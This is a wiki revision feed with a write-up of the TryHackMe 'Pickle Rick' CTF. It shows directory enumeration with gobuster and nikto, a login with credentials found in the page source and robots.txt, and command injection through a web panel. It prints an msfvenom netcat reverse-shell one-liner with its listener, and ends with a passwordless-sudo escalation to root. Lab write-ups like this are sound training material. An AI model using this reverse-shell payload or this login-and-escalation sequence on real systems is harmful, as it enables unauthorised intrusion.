https://book.ghanim.no/index.php?action=history&feed=atom&title=Write-ups%2FTHM%2FPickle_RickWrite-ups/THM/Pickle Rick - Revision history2026-04-21T16:18:54ZRevision history for this page on the wikiMediaWiki 1.45.1https://book.ghanim.no/index.php?title=Write-ups/THM/Pickle_Rick&diff=1140&oldid=previmported>Aghanim at 23:10, 22 May 20212021-05-22T23:10:33Z<p></p>
<p><b>New page</b></p><div>{{Infobox WriteUp<br />
| name = Pickle Rick<br />
| platform = TryHackMe<br />
| os = Linux<br />
| difficulty = Easy<br />
| techniques = Web Enumeration, Command Injection<br />
}}<br />
<br />
This is a CTF on TryHackMe website.<br />
<br />
<br />
The task is that you will have to help Pickle Rick find 3 ingredients so he can turn himself back into a human.<br />
<br />
<br />
When you deploy the machine you are presented with a website.<br />
<br />
<br />
[[File:2021-05-Skjermbilde-2021-05-23-kl.-00.34.40.png|thumb]]<br />
<br />
<br />
== Enumeration stage ==<br />
<br />
<br />
The first thing I like to do is look at the source code. We find a username: '''R1ckRul3s'''.<br />
<br />
<br />
[[File:2021-05-Skjermbilde-2021-05-23-kl.-00.44.29.png|thumb]]<br />
<br />
<br />
We can look for any hidden directories. I like to use Gobuster for this task. The command I´ll use is:<br />
<br />
<br />
gobuster dir -u http://10.10.222.6 -w /usr/share/wordlists/dirb/common.txt -q<br />
<br />
/.hta (Status: 403)<br />
/.htaccess (Status: 403)<br />
/.htpasswd (Status: 403)<br />
/assets (Status: 301)<br />
/index.html (Status: 200)<br />
/robots.txt (Status: 200)<br />
/server-status (Status: 403)<br />
<br />
</pre><br />
<br />
<br />
In /robots.txt we find something interesting.<br />
<br />
<br />
Wubbalubbadubdub<br />
<br />
</pre><br />
<br />
<br />
It is smart to use other tools aswell, and not just rely on one. You can use photon, raccoon or Nikto for example. I will use Nikto with the command:<br />
<br />
<br />
nikto -h 10.10.222.6<br />
<br />
- Nikto v2.1.5<br />
---------------------------------------------------------------------------<br />
+ Target IP: 10.10.222.6<br />
+ Target Hostname: ip-10-10-222-6.eu-west-1.compute.internal<br />
+ Target Port: 80<br />
+ Start Time: 2021-05-22 23:49:17 (GMT1)<br />
---------------------------------------------------------------------------<br />
+ Server: Apache/2.4.18 (Ubuntu)<br />
+ Server leaks inodes via ETags, header found with file /, fields: 0x426 0x5818ccf125686<br />
+ The anti-clickjacking X-Frame-Options header is not present.<br />
+ No CGI Directories found (use '-C all' to force check all possible dirs)<br />
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).<br />
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS<br />
+ Cookie PHPSESSID created without the httponly flag<br />
+ OSVDB-3233: /icons/README: Apache default file found.<br />
+ /login.php: Admin login page/section found.<br />
+ 6544 items checked: 0 error(s) and 7 item(s) reported on remote host<br />
+ End Time: 2021-05-22 23:49:26 (GMT1) (9 seconds)<br />
---------------------------------------------------------------------------<br />
+ 1 host(s) tested<br />
<br />
<br />
</pre><br />
<br />
<br />
We find an admin login page, /login.php.<br />
<br />
<br />
[[File:2021-05-Skjermbilde-2021-05-23-kl.-00.54.26.png|thumb]]<br />
<br />
<br />
From previous enumeration we found the username, and from robots.txt we would assume that that would be the password.<br />
<br />
<br />
After logging in, we are presented with this.<br />
<br />
<br />
----<br />
<br />
<br />
== Gaining Access ==<br />
<br />
<br />
[[File:2021-05-Skjermbilde-2021-05-23-kl.-00.55.46.png|thumb]]<br />
<br />
<br />
The other tabs only says that: Only the real rick can enter.<br />
<br />
<br />
We will try out some commands, like ls.<br />
<br />
<br />
[[File:2021-05-Skjermbilde-2021-05-23-kl.-00.57.24.png|thumb]]<br />
<br />
<br />
We found the first ingredient. Lets try and cat it.<br />
<br />
<br />
[[File:2021-05-Skjermbilde-2021-05-23-kl.-00.58.52.png|thumb]]<br />
<br />
<br />
That dosent work. Iinstead I will try and create a reverse shell to the webserver instead.<br />
<br />
<br />
We can use msvenom to generate a revershell payload that we can try and run.<br />
<br />
<br />
root@ip-10-10-235-26:~# msfvenom -p cmd/unix/reverse_netcat lhost=10.10.235.26 lport=4444 R<br />
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload<br />
[-] No arch selected, selecting arch: cmd from the payload<br />
No encoder specified, outputting raw payload<br />
Payload size: 94 bytes<br />
mkfifo /tmp/siank; nc 10.10.83.119 4444 0/tmp/siank 2>&1; rm /tmp/siank<br />
<br />
</pre><br />
<br />
<br />
I will setup netcat so it listens to port 4444 and execute the command on the website. This will give me a reverse Shell, and I can try and read the files again.<br />
<br />
<br />
root@ip-10-10-235-26:~# nc -lvnp 4444<br />
Listening on [0.0.0.0] (family 0, port 4444)<br />
Connection from 10.10.222.6 35688 received!@<br />
ls<br />
Sup3rS3cretPickl3Ingred.txt<br />
assets<br />
clue.txt<br />
denied.php<br />
index.html<br />
login.php<br />
portal.php<br />
robots.txt<br />
cat Sup3rS3cretPickl3Ingred.txt<br />
mr. meeseek hair<br />
<br />
</pre><br />
<br />
<br />
The clue says: Look around the file system for the other ingredient.<br />
<br />
<br />
cd home<br />
ls<br />
rick<br />
ubuntu<br />
cd rick<br />
ls<br />
second ingredients<br />
cat second\\ ingredients<br />
1 jerry tear<br />
<br />
</pre><br />
<br />
<br />
We can try and see if the user is in sudoers. There is no password for sudo, which is not good.<br />
<br />
<br />
sudo su<br />
su - root<br />
mesg: ttyname failed: Inappropriate ioctl for device<br />
whoami<br />
root<br />
cd /root<br />
ls<br />
3rd.txt<br />
snap<br />
cat 3rd.txt<br />
3rd ingredients: fleeb juice<br />
<br />
</pre><br />
<br />
[[Category:Linux]]<br />
[[Category:TryHackMe]]<br />
[[Category:Write-ups]]</div>imported>Aghanim